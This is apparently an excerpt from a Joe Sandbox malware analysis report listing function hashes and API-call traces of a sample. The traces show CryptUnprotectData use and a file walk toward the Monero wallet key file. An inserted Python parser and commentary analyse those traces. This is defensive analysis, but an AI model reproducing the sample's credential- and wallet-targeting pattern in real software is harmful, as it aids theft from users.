                              • Instruction ID: cfe400d9e92d084a29ca456d9c732f8f2c92517b2b3df68930894eabd317aa91
                              • Opcode Fuzzy Hash: 342f780841e057a41bb44af43aa1e7b94a668798ba55007a56b531dcf8ec8606
                              • Instruction Fuzzy Hash: 5EB2F9F360C204AFE3046E2DEC8577ABBE9EF94720F1A4A3DEAC4C7744E63558058656
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: cF?w$jqk/$yMS:
                              • API String ID: 0-271534656
                              • Opcode ID: 85b0758ceaa7d0b279d58b572652118ed5f23b390df95dd14dc372ddd18a0cfe
                              • Instruction ID: c94341761f176f8478ef1bab084e322c4251cca44d722e335e5cd1118ca05726
                              • Opcode Fuzzy Hash: 85b0758ceaa7d0b279d58b572652118ed5f23b390df95dd14dc372ddd18a0cfe
                              • Instruction Fuzzy Hash: 8C92E3F35082049FE704AF29EC8567AFBE9EF94320F1A492DEAC4C3744EA3558458797
                              APIs
                              • CoCreateInstance.COMBASE(0015E118,00000000,00000001,0015E108,00000000), ref: 00153758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001537B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2851760cdf953276c82ddeec72de7d493c598eab1c3ef5c91be2a569a56733d1
                              • Instruction ID: fed379fd15085cc0d57c269e73b21c3b3d396b8e98f4a90b3ae7dee6b2aed31d
                              • Opcode Fuzzy Hash: 2851760cdf953276c82ddeec72de7d493c598eab1c3ef5c91be2a569a56733d1
                              • Instruction Fuzzy Hash: 4241EA71A40A18DFDB24DB58CC95B9BB7B5BB48702F4042D8E618EB2D0D7716E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00149B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00149BA3
                              • LocalFree.KERNEL32(?), ref: 00149BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 47664ddb3dd477cb48ada2e143309abe7fb4c9fad6dde8eafa73e2df0b771a8a
                              • Instruction ID: 03df24514931694ec3be72815ddc08f8e450b5b8d9e079accb5d87996b1abca1
                              • Opcode Fuzzy Hash: 47664ddb3dd477cb48ada2e143309abe7fb4c9fad6dde8eafa73e2df0b771a8a
                              • Instruction Fuzzy Hash: A011BAB4A00209DFDB05DFA4D985EAE77B9FF88300F104599E91597350D774AE11CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: J'pY$$<%
                              • API String ID: 0-4009180616
                              • Opcode ID: 1aa50ea712617aefa15169daaabcbec5fd60e989c06d21d4c9c8e05615a5e1a8
                              • Instruction ID: 0983f02d9acbd4ead7a50aa476e446c0f879f603768492390cd4efa0e77cdcbd
                              • Opcode Fuzzy Hash: 1aa50ea712617aefa15169daaabcbec5fd60e989c06d21d4c9c8e05615a5e1a8
                              • Instruction Fuzzy Hash: 85B2F4F360C2049FE304AE2DEC8567AFBE9EB94320F16493DEAC5C3744EA3558458697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \0{_$zwC
                              • API String ID: 0-2872698686
                              • Opcode ID: 33fcda14685dc79a5add6a12b8d6e497985e0d802811d47ea8a63b170c1cf5eb
                              • Instruction ID: 8123aeca861525af0781375487f911c2222aefb3c792a62e80e49c22a953e980
                              • Opcode Fuzzy Hash: 33fcda14685dc79a5add6a12b8d6e497985e0d802811d47ea8a63b170c1cf5eb
                              • Instruction Fuzzy Hash: B3B2E4F3A0C6009FE704AE29EC8567AFBE9EF94720F16893DE6C4C3744E63558458693
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3~-$;M~
                              • API String ID: 0-3991053826
                              • Opcode ID: 955a981fbb44f7923c2281397cf47c3e458776e616277cfc3d43de412f5dacef
                              • Instruction ID: 0e496297a42bf0eafb6b818fca6bb148eb509cb528472e4aab507730cb09d501
                              • Opcode Fuzzy Hash: 955a981fbb44f7923c2281397cf47c3e458776e616277cfc3d43de412f5dacef
                              • Instruction Fuzzy Hash: 4692D5F360C6009FE304AE2DEC8567ABBE9EFD4720F16893DE6C4C7744EA3558418696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Ht'$/jy
                              • API String ID: 0-1789625261
                              • Opcode ID: adf2c5f9044d9ca187d1528a640e52d4a69d68cb719235b374ba6571ef04a788
                              • Instruction ID: 0b5464aedf9dfce5c877e9af5f8517eb19810f702a3af9b34af9ce1d0a2f79f5
                              • Opcode Fuzzy Hash: adf2c5f9044d9ca187d1528a640e52d4a69d68cb719235b374ba6571ef04a788
                              • Instruction Fuzzy Hash: 565218F3A0C204AFD3046E2DDC8567BBBE9EBD4620F1A463DEAC4C3744E67558058697
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001615B8,00160D96), ref: 0014F71E
                              • StrCmpCA.SHLWAPI(?,001615BC), ref: 0014F76F
                              • StrCmpCA.SHLWAPI(?,001615C0), ref: 0014F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0014FAC3
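The API block above is the most informative part of this listing: a FindFirstFileA / FindNextFileA / FindClose loop with two StrCmpCA compares on every entry, path building through lstrcpy / lstrcat helpers, and one resolved string argument, `\Monero\wallet.keys`, passed to lstrlen inside a helper. The following parser, added here as an example and not part of Joe Sandbox or of the analysed sample, turns lines in this exact report format into records and derives those observations mechanically. The input constant is the twelve lines above copied verbatim. The two StrCmpCA targets (001615BC, 001615C0) are not resolved by the report, so whether they are "." and ".." is an inference; the code only counts compares inside the loop and does not name them.

```python
"""Turn the 'APIs' block of a Joe Sandbox function listing into structured records.

Added example; not Joe Sandbox code. SAMPLE_API_LINES is the API block of the
function at 0014F71E..0014FAC3 in this report, copied verbatim.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_API_LINES = r"""
• Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
• Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
• Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
• Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
• Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
• Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
• Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001615B8,00160D96), ref: 0014F71E
• StrCmpCA.SHLWAPI(?,001615BC), ref: 0014F76F
• StrCmpCA.SHLWAPI(?,001615C0), ref: 0014F785
• FindNextFileA.KERNEL32(000000FF,?), ref: 0014FAB1
• FindClose.KERNEL32(000000FF), ref: 0014FAC3
"""

# One report line: optional "Part of subcall function XXXXXXXX: ", then api.MODULE(args), ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})\s*$"
)
ADDR_RE = re.compile(r"[0-9A-F]{8}$")  # an unresolved 8-digit pointer/handle value


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                # address of the call site
    subcall: Optional[int]  # address of the helper making the call; None for direct calls


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m["args"].split(",") if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def string_literals(calls: List[ApiCall]) -> List[str]:
    """Arguments the sandbox resolved to readable strings (neither '?' nor a bare address)."""
    return [a for c in calls for a in c.args if a != "?" and not ADDR_RE.match(a)]


def direct_chain(calls: List[ApiCall]) -> List[str]:
    """APIs called by the listed function itself, in call-site address order."""
    own = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    return [c.api for c in own]


def is_directory_walk(calls: List[ApiCall]) -> bool:
    """FindFirstFile, then FindNextFile, then FindClose at increasing addresses is the
    standard enumeration loop; whatever sits between the first two runs once per entry."""
    chain = direct_chain(calls)
    want = ["FindFirstFileA", "FindNextFileA", "FindClose"]
    if not all(w in chain for w in want):
        return False
    pos = [chain.index(w) for w in want]
    return pos == sorted(pos)


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    by_ref = {c.api: c.ref for c in calls if c.subcall is None}
    compares = 0
    if is_directory_walk(calls):
        lo, hi = by_ref["FindFirstFileA"], by_ref["FindNextFileA"]
        # Compares applied to each entry. The report leaves their targets as addresses,
        # so skipping "." and ".." is only an inference; report the count, not the meaning.
        compares = sum(1 for c in calls if c.api == "StrCmpCA" and lo < c.ref < hi)
    return {
        "directory_walk": is_directory_walk(calls),
        "compares_in_loop": compares,
        "strings": string_literals(calls),
        "modules": dict(Counter(c.module for c in calls)),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{key}: {value}")
```

Running it on the block above reports a directory walk with two compares per entry, ten KERNEL32 and two SHLWAPI calls, and `\Monero\wallet.keys` as the only resolved string, which is the same reading an analyst would take from the listing by hand: the function enumerates a directory and the helper it calls builds a path ending in the Monero wallet key file.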
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a6b02febdd4725413dc6051c37d35344316cacb27c1bf8cdb4779629496749e7
                              • Instruction ID: 75fbe61812c0521df11f7d90a8b48ad2fd8c5b485a430cc6bf5345135ae577d7
                              • Opcode Fuzzy Hash: a6b02febdd4725413dc6051c37d35344316cacb27c1bf8cdb4779629496749e7
                              • Instruction Fuzzy Hash: 56118B3188411DDBDB14EB60DC559DD7378BF20301F9043A9A92A5B092EF30274EC792
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'J^k
                              • API String ID: 0-2683603079
                              • Opcode ID: 2261ad9ccdbd36daea528ae9b1af70624d92d8a4666fe73eba6a75951604736b
                              • Instruction ID: 1b92937612049cbd8ecc54a7fb12a5e5c2398941b5d295a8a7084a6970e8fa21
                              • Opcode Fuzzy Hash: 2261ad9ccdbd36daea528ae9b1af70624d92d8a4666fe73eba6a75951604736b
                              • Instruction Fuzzy Hash: 6E5126B3A081109FE7046A3CDD557AFB7A5EB94320F2B463DEAD5E3B40E53998018682
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 11d9b45d2fadbfb0a90b420addd1a22ab86851f9a82b835b6027ee61dfbd21e5
                              • Instruction ID: aaf11a981c8fc4f95f6f2b59af752993ef46adfcfd8bc7e9c49fcccd2478656c
                              • Opcode Fuzzy Hash: 11d9b45d2fadbfb0a90b420addd1a22ab86851f9a82b835b6027ee61dfbd21e5
                              • Instruction Fuzzy Hash: 30512BF3E186159BE3046E3CDC5976AB791EF94310F1F4A3CE9C8D7784EA3949058682
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea8704e6b10542bfe6f12de5ad65899a7f9fa29c2ea8ab5a13edb24a9ba3f7d2
                              • Instruction ID: 299e214a13c42a2b8fee6fa662f10b77b1ffc7b3f126f6236fa17b5c35012beb
                              • Opcode Fuzzy Hash: ea8704e6b10542bfe6f12de5ad65899a7f9fa29c2ea8ab5a13edb24a9ba3f7d2
                              • Instruction Fuzzy Hash: 03517CF3E193045BE7086E3DEC4432ABBDADBD4220F6A463DEA8583384FD7958164183
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04aa4a6fe8fbce4760b916471149a9f28e8717c03380db198b7ed4b01d32dd73
                              • Instruction ID: 42f723661385d400f7a36ee63a5016290d3c6c6fb04ba4507b139b6cb0b58c58
                              • Opcode Fuzzy Hash: 04aa4a6fe8fbce4760b916471149a9f28e8717c03380db198b7ed4b01d32dd73
                              • Instruction Fuzzy Hash: 53513BB3A093189BE314BD29DC4477AFBDADBC4331F26863DDA9493784E9351D048296
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a9a1edcb2d6d6915b5fe20c775c648059999880883e20c878b53d3ecb15b656
                              • Instruction ID: 7d95de664e876f162b65c79e6ab6f686d091a231c44a73cfb46807a45ef1401e
                              • Opcode Fuzzy Hash: 7a9a1edcb2d6d6915b5fe20c775c648059999880883e20c878b53d3ecb15b656
                              • Instruction Fuzzy Hash: 5D5149F3E096045FF7049E2DEC85726B7D6EB98721F2B863DE684C3385E97898008691
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
